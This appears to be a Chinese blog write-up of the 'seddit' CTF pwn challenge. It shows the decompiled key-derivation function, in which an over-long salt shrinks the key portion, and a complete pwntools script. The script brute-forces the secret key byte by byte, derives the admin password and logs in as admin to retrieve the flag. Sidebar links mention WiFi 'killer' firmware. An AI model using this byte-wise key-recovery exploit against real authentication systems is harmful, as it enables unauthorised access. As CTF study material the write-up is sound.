[BMZCTF-pwn] 13_ectf-2014 seddit

已于 2022-02-16 08:39:48 修改
阅读量244 收藏
点赞数
分类专栏: CTF pwn 文章标签: pwn
于 2022-02-14 00:15:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/122909784
版权

一开始看到不少溢出,但是由于有canary这些都无法用。还是从头开始读程序。

程序包含3块:

  1. 第一块读入用户名和salt盐在盐后加上后台的key得到密钥再通过密钥算出密码。
  2. 通过用户名和密码登录,用户名是admin且验证成功后显示flag
  3. 没有用

很显然如果第1步让用admin就好办了。然无。

这个盐有个溢出:盐长度不足7位时会补成7位后边加7位key。如果超过7位则用的key就会相应减少。当盐为13位时就只用到第1位key。那么就可以很容易的爆破出key的值。然后用des算出密码就ok了。

unsigned __int64 __fastcall sub_400A04(__int64 a1, _QWORD *a2)
{
  char v3[140]; // [rsp+20h] [rbp-B0h] BYREF
  int fd; // [rsp+ACh] [rbp-24h]
  char dest[16]; // [rsp+B0h] [rbp-20h] BYREF
  char v6[8]; // [rsp+C0h] [rbp-10h] BYREF
  unsigned __int64 v7; // [rsp+C8h] [rbp-8h]

  v7 = __readfsqword(0x28u);
  *a2 = 0LL;
  *(_QWORD *)dest = 0LL;
  fd = open("key", 0);
  if ( strlen(byte_6020C0) <= 6 )  //当salt为13位时,只用到1位key 可依次爆破key
    strncpy(&byte_6020C0[strlen(byte_6020C0)], "aaaaaaa", 7 - strlen(byte_6020C0));
  strncpy(dest, byte_6020C0, strlen(byte_6020C0));
  read(fd, &dest[strlen(byte_6020C0)], 7uLL);
  dest[14] = 0;
  close(fd);
  DES_string_to_key(dest, v6);
  DES_set_key(v6, v3);
  DES_ecb_encrypt(a1, a2, v3, 1LL);
  return __readfsqword(0x28u) ^ v7;
}

另外就是写程序算des不一定容易,可以直接把原程序patch一下让他不检查admin用户名,这样通过原程序就可以得到密码。

from pwn import *

local = 1
if local == 1:
    p = process('./pwn')
else:
    p = remote('node4.buuoj.cn', 28546) 

elf = ELF('./pwn')
context.arch = 'amd64'

def getkey(salt):
    p.sendlineafter(b"What would you like to do? ", b'1')
    p.sendlineafter(b"Enter username:", b's')
    p.sendlineafter(b"Enter salt:", salt)
    p.recvuntil(b'Your password is: ')
    return p.recv(16)

def password():
    tp = process('./pwn_local')
    tp.sendlineafter(b"What would you like to do? ", b'1')
    tp.sendlineafter(b"Enter username:", b'admin')
    tp.sendlineafter(b"Enter salt:", b'aaaaaaa')
    tp.recvuntil(b'Your password is: ')
    return tp.recv(16)

def getflag(password):
    p.sendlineafter(b"What would you like to do? ", b'2')
    p.sendlineafter(b"Enter username:", b'admin')
    p.sendlineafter(b"Enter password:", password)
    return p.recv()

key = b''
for i in range(13,6,-1):
    salt = b'A'*i
    tmpkey = getkey(salt)
    print(tmpkey)
    for j in range(0x21,0x80):
        tmp = getkey(salt+key+p8(j))  #逐位缩短的salt+key已知部分+猜 密码相同即为正确的key
        if tmp == tmpkey:
            key += p8(j)
            print('key:', key)
            break

open('key', 'wb').write(key)

password = password() #利用本地程序运算求密码
print(password)
context.log_level = 'debug'
    
print(getflag(password))

pause()

石氏是时试
关注
专栏目录
羊城杯_2020_babyre 题解
lifanxin的博客
09-09 1203
babyre题目信息考查知识题目分析WP脚本总结 题目信息   本题目来自于2020年羊城杯的逆向题,可以在buuoj上找到题目复现。 考查知识   本题目考查的知识点有:DES/AES算法,SMC自修改代码,以及合理利用动态调试来快速解题。   关于动态调试,这里很多人可能会遇到环境问题,主要是因为题目调用了openssl的动态加密算法库,所以本地也得有一个。同时还需要注意openssl加密算法库的版本问题,该题目必须使用libcrypto.so.1.0.0。这里我给出该算法库文件 – libcrypto
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 987
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
什么是ECTF
skyme
01-08 1047
 
攻防世界PWNseddit题解
seaaseesa的博客
02-09 354
seddit 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 是一个模拟登陆的程序,密码就是用户名用salt+key来加密后的结果 只要我们能够成功登陆admin账号,就能输出答案 溢出点在这 我们可以让salt的长度为16,这样,key的内容就会写到v5的地址处,这样我们后面再输出,就能得到key,然后我们加密admin字符串,即可得到密码登陆 综上,我们...
OPENSSL库的使用-DES篇
宁静致远的博客
12-04 5697
OPENSSL库的使用-DES篇1 DES算法简介1.1 DES算法介绍1.2 工作模式1)ECB模式2)CBC模式3DES 算法2 单DES算法ECB模式加解密2.1 使用函数DES_set_key_unchecked设置密钥。2.2 使用函数DES_ecb_encrypt来进行数据加解密3 单DES算法CBC模式加解密3.1 使用函数DES_set_key_unchecked设置密钥3.2 使用函数DES_ncbc_encrypt来进行数据加解密 原文链接: https://blog.csdn.net/
[BMZCTF-pwn] 48_gactf2020-vmpwn
weixin_52640415的博客
02-24 1057
虚拟机太麻烦了,有一块不明白看了个exp,但是明显这个exp的命令格式不对。但大意明白了。 为防自己以后不明白,把说明写到注释里。也就不用写别的了。全在代码里了。 from pwn import * local = 1 if local == 1: p = process('./pwn') else: p = remote('1.1.1.1', 28546) libc_elf = ELF('/home/shi/buuctf/buuoj_2.23_amd64/libc6_2.23-
[BMZCTF-pwn] 20-secret_file
weixin_52640415的博客
02-15 2820
栈内溢出的题 读完程序也就完事了 __int64 __fastcall main(int a1, char **a2, char **a3) { char *v3; // rax unsigned __int8 *v4; // rbp char *v5; // rbx __int64 v6; // rcx char *v7; // rdi unsigned int v8; // er12 FILE *v9; // rbp size_t v11; // [rsp+0h]
[BMZCTF-pwn] 22-pwn1
weixin_52640415的博客
02-16 170
昨天整了第一届BMZCTFpwn题,都来得及写。这一届一共五个pwn题,难度逐个增加。 第一个是个32位no pie,got表可写。程序很短,直接调用无格式参数的printf,而且有循环,got表还有system项。基本属于无障碍型。 int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { char s[100]; // [esp+18h] [ebp-70h] BYREF unsigned i
[BUUCTF-pwn]——pwn1_sctf_2016
Y_peak的博客
01-30 902
[BUUCTF-pwn]——pwn1_sctf_2016 题目地址:https://buuoj.cn/challenges#pwn1_sctf_2016 题目: 话不多说,先下载下来再说。 在Linux上 checksec一下,发现开启了NX保护,但是没有开启Stack的保护,也就是说我们可以很轻易的利用栈溢出。 在window的IDA上反汇编看下源码,额 ,main函数没有什么有用的信息。我们可以看下vuln函数。 发现好大一堆,发现了fgets函数,但是很遗憾。它要求我们只能输入不超过32个字符。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
注册会计师会计第十五章 债务重组.doc
09-16
注册会计师会计第十五章 债务重组.doc
第0章 前言.doc
09-16
第0章 前言.doc
python链表实战制作学生管理系统(附带pyqt5的界面优化)
最新发布
09-16
python链表实战制作学生管理系统(附带pyqt5的界面优化)
首都体育学院在河北2021-2024各专业最低录取分数及位次表.pdf
09-16
全国各大学在河北2021-2024年各专业最低录取分数及录取位次数据,高考志愿必备参考数据
西南石油大学在河南2021-2024各专业最低录取分数及位次表.pdf
09-16
全国各大学在河北2021-2024年各专业最低录取分数及录取位次数据,高考志愿必备参考数据
深圳大学在河南2021-2024各专业最低录取分数及位次表.pdf
09-16
全国各大学在河北2021-2024年各专业最低录取分数及录取位次数据,高考志愿必备参考数据
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值